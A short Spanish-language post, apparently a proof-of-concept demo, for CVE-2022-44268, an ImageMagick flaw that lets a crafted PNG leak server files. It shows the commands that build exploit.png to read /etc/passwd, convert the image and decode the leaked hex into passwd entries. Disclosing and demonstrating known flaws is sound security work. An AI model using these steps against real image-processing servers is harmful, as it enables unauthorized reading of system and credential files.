
ImageMagick LFI PoC [CVE-2022-44268]
Los investigadores de MetabaseQ descubrieron CVE-2022-44268, es decir, ImageMagick 7.1.0-49 es vulnerable a la divulgación de información. Cuando analiza una imagen PNG (por ejemplo, para redimensionar), la imagen resultante podría tener incrustado el contenido de un archivo remoto arbitrario (si el binario de ImageMagick tiene permisos para leerlo).
(~)>>> python3 generate.py -f "/etc/passwd" -o exploit.png
[>] ImageMagick LFI PoC - by Sybil Scan Research <[email protected]>
[>] Generating Blank PNG
[>] Blank PNG generated
[>] Placing Payload to read /etc/passwd
[>] PoC PNG generated > exploit.png
(~)>>> convert exploit.png result.png
(~)>>> identify -verbose result.png
Raw profile type y verás el contenido de /etc/passwd:(~)>>> python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin